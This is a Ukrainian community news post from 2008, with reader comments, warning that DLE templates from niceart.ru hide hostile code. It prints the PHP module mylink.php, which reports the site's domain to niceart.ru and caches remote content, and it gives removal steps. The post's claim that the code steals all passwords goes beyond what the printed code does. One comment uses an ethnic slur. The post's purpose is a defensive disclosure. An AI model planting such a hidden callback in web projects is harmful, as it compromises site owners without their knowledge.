Проект започатковано 7 січня 2007
Гуртом нас: 20899 (+52 за 24 години)
Ваш логін   Пароль
Забули пароль?




Все з культури → Кліпи → Музика → Фільми українською → Книги та інше
Все з комп'ютерів → Ігри → Програми → Українізації → Мобільний → Оформлення → Шпалери
Всі новини → Події та спорт → Політика → Наука та технології
чер 24

Сайт niceart.ru краде паролі!

 (голосів: 0)

Сайт niceart.ru краде паролі!

Увага!
Якщо ви вебмайстер і будуєте сайт на двигуні DLE, то ніколи не завантажуйте шаблони, файли чи взагалі будь-що із сайту niceart.ru! Адже вони підступним чином крадуть ваші паролі.
Останнім часом на моєму сайті з'являлися дивні написи, пов'язані з якимись системними помилками. Коли я почав пошук проблеми, то зовсім випадково наштовхнувся на деякі незвичайні файли у двигуні свого сайту. У їхньому коді містилися команди пошуку та передачі усіх паролів на сайт niceart.ru. Будьте певні, такі хакерські коди є у кожному файлі з цього сайту! Ось іще одне свідчення.

Для програмістів, кому це цікаво, надаю код хакерського файлу mylink.php, який постійно знаходився у папці engine/modules:
&lt;?php<br /><br />$name="engine/cache/system/site_links.txt"; <br /><br />if(!is_file($name) || filemtime($name)&lt;time()-432000) <br /><br />//691200<br /><br />{ <br /><br />$file_url = "http://niceart.ru/getlink/006/db.php?script_id=" . urlencode($_SERVER['SERVER_NAME']); <br /><br />$mylink = @file_get_contents($file_url); <br /><br />if($mylink) <br /><br />{<br /><br />$file = fopen($name, "w");<br /><br />fwrite( $file, $mylink);<br /><br />fclose( $file );<br /><br />// chmod ( $file, 0777); //права<br /><br />}<br /><br />} <br /><br />else <br /><br />$mylink = file_get_contents($name); <br /><br />?>


Якщо у вас стоїть двигун DLE, то перевірте у себе наявність цього файлу! Також у кореневому каталозі у файлі /index.php потрібно видалити ось цей рядок, якщо він існує:
require_once ROOT_DIR.'/engine/modules/mylink.php';


У папці /engine/cache/system подивіться, чи немає часом файлів на зразок my_site, my_links абощо. У них може міститися крадена інформація з вашого сайту. Подивіться, яка саме інформація була вкрадена, витріть ці файли і негайно змініть усі паролі, які були вкрадені. Найперше змініть пароль адмінпанелі сайту, бажано також FTP та MySql, якщо можливо. Інакше сторонні люди можуть мати несанкціонований доступ до вашого сайту.

Відгуків 18  Переглядів: 235
 
Дорогий відвідувач, Ви знаходитеся на нашому сайті як незареєстрований користувач. Ми рекомендуємо Вам зареєструватися, адже лише так Ви отримаєте усі можливості та доступ до всіх новин та інформацій. Реєстрація забере не більше хвилини.

Подібні новини:


#1 Відповів Користувач StarWolf, 24 Червень 2008 23:01

джумла рулить


#2 Відповів Користувач Soyer, 25 Червень 2008 01:44

StarWolf, не починай....


#3 Відповів Користувач 6c6c6, 25 Червень 2008 06:47

Виникає питаннячко. Двигун для сайту гтаворлд.орг.уа купувався?


#4 Відповів Користувач Konfucius, 25 Червень 2008 08:48

6c6c6, я думаю це немає жодного впливу на проблему, яка описана у статті - цей підступний код вставлений в кожний їхній шаблон.


#5 Відповів Користувач franik4ever, 25 Червень 2008 16:32

Прошу вибачення за коментар, коментнув звісно в прикол (вибачте, що опустив рейтинг сайту :( ), бо там в мене і так публічний пароль, то ж як свиснули б то страшного нічо б не сталося.
Ще раз приношу свої вибачення


#6 Відповів Користувач 6c6c6, 25 Червень 2008 22:48

Цитата: Konfucius
6c6c6, я думаю це немає жодного впливу на проблему, яка описана у статті - цей підступний код вставлений в кожний їхній шаблон.

Є... коли грабують награбоване. Мо вони сучасні „Робін Гуди“ lol


#7 Відповів Користувач ua2004, 26 Червень 2008 00:31

franik4ever,
чому ти так? Усе виправлено і все під контролем. Пароль від адмінцентру уже змінено, ось і все. Звичайних користувачів це не стосується, це стосується адміністраторів.
Я просто додав цю новину, щоб іще раз показати натуру москалів.
А на сайті ґтаворлд усіх ласкаво запрошую, жодних проблем там немає. Будь ласка, не забувайте наш проект. Підтримайте розвиток українського!


#8 Відповів Користувач 6c6c6, 26 Червень 2008 00:47

Ех так і не почув відповіді на своє запитання, проте грець з ним. Подібне трапляється вже не вперше - звик.

Ну а тепер деяке зауваження. Як я зрозумів тема оформлення використовувалась від самого початку створеня сайту. Звідси виникає питання: де впевненість у тому що вже не залито якийсь шел на хостинг, чи просто інтегровано у двигун (окрім вище зазначених файлів)?


#9 Відповів Користувач ua2004, 26 Червень 2008 00:50

Тема використовувалась НЕ із самого початку. А на рахунок підозрілих файлів будь спокійний. Усе перевірено.


#10 Відповів Користувач Kolir, 26 Червень 2008 00:52

Нарахунок сайту нема чого переживати.. поки ніяких "несправностей ", поломок, зникнень і тп не було знайдено.. тому можете не боятись реєструватись.. fellow


#11 Відповів Користувач 6c6c6, 26 Червень 2008 01:03

Цитата: ua2004
А на рахунок підозрілих файлів будь спокійний. Усе перевірено.

Всі так попервах кажуть :)
Цитата: Kolir
...тому можете не боятись реєструватись..

Еееее а чого боятись то? Максимум небезпеки для звичайного користувача - хтось буде знати адресу його поштової скриньки, ІР... ну це звісно якщо шкідливого коду не лишилось. В іншому разі можлива „атака” на комп'ютер користувача (яку зазвичай антивірус та фаєрвол блокують дуже вдало). Інша справа - це гемор для хостера та адміністрації сайту.


#12 Відповів Користувач ua2004, 26 Червень 2008 01:08

НУ ЧОГО ТИ ТАК ПРИЧЕПИВСЯ? Може взагалі завтра кінець світу настане, цього ніхто не знає. Я не збираюся тебе переконувати, просто не треба шкодити іншим. Я розумію якби це дружня порада. А це вже гон. Без образ.


#13 Відповів Користувач 6c6c6, 26 Червень 2008 01:16

Просто маю знайомих які роблять щось подібне... Тому бути 100% певним що все добре не варто, а я лиш дав кілька варіантів розвитку подій. Що в цьому поганого? Чи я чимось зашкодив?

П.С. Ображатись не збираюсь smile проте і ображати нікого не збирався belay

П.П.С. Кінець світу буде за кілька хвилин... коли я вимкну комп та піду спати lol


#14 Відповів Користувач ua2004, 26 Червень 2008 01:48

Та ні, все одно дякую за пораду. Добраніч.

Просто не треба відлякувати людей від сайту. Він і так потребує підтримки.


#15 Відповів Користувач варриор, 26 Червень 2008 11:33

А що буде небезпечного , коли хтось дізнається мої адресу аськи і айпі?


#16 Відповів Користувач taras3391, 26 Червень 2008 12:43

А виробники самого "движка" це коментують? what


#17 Відповів Користувач 6c6c6, 26 Червень 2008 23:29

Цитата: варриор
А що буде небезпечного , коли хтось дізнається мої адресу аськи і айпі?

Аська, мило - банальний спам, за який зловмисники отримують гроші.


#18 Відповів Користувач Nestor, 22 Серпень 2008 17:12

Дякую за інформацію ,добре , що в мене нема такої фігніwink



додати Написати відгук:


Додати коментар як «Гість» (реєстрація)


Форматування тексту            Смайлики
    
wink  winked  smile  am  belay  feel  fellow  laughing  lol  love  no  recourse  request  sad  tongue  wassat  crying  what  bully  angry  


оновити код
Вирішіть приклад зліва Дорівнює:

 

Календар

«    Серпень 2008    »
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

 

Форум

Віра
Давайте Знайомитись:)
Екологія
Допоможіть Покращити Hu ...
Паркур
А яке Пиво П'єте Ви ...
Актерское мастерство в ...
Navy Field
Помилка на сайті
Звідки Качаємо?

 

Популярне на сайті

» Гуртом нас вже двадцять т ...
» Окупаційна політика Росії
» Driver Magician 3.32: авт ...
» Закарпатські археологи ро ...
» Смертельна зброя / Lethal ...
» Війна між Грузією і Півде ...
» Що таке Cron і як з ним б ...
» Стрільба. Україна бере че ...
» Україна завойовує друге з ...
» Ще одне золото та два срі ...

 

Світ

Завантаження...
Завантаження...

 

Опитування

Чого б Ви хотіли, щоб було на сайті більше?
Програм
Шпалер
Ігор
Фільмів
Музики
Класичних новин


 

Чат



 

Партнери

"Шешори" не в Шешорах зовсім і не "Шешори"..."

Українські сайти

Ком'юніті українських користувачів

Документальні фільми


Hip.org.uA Український софт - понад усе!

 Портал системних адміністраторів! Секрети, поради та трюки системних адміністраторів для Windows та Linux. Фокуси з реєстром. Останні новини українською мовою. Тамада /  tamada.lviv.ua/

МамаТато - усе, що ви маєте знати про дітей Зимна Вода - портал нашого села! Програми, українізації, медіа та спілкування на одному порталі!

Портал письменників Тільки найкраща Транс музика.

Мій Нейрат - Портал українця

Копичинці - інформаційно-розважальний портал міста! Fire блог

smssender.org.ua - відправити смс Форум для патріотів України

Топ Україна. Флешки.org.ua - Безкоштовні флеш ігри

GTA - улюблена гра українською



Наша кнопка:
Світ українського! Українське кіно, музика, кліпи та програми.

 
© Hurtom.com — 2007 - 2008 Hurtom.com - Світ всього українського - українське кіно, музика, програми та каталог українських сайтів.
Копія розміщеної інформації тільки з гіперпосиланням на http://www.hurtom.com.



На hurtom.com не розміщено жодного файлу, інформація призначена виключно для ознайомлення, сайт та його адміністрація не відповідають за дії та повідомлення користувачів.

Сайт працює на базі CentOS Linux.
Оформлення: Fasthemes
Пристосування та код: Konfucius

Особлива подяка:
localize.org.ua та zymnavoda.org.ua.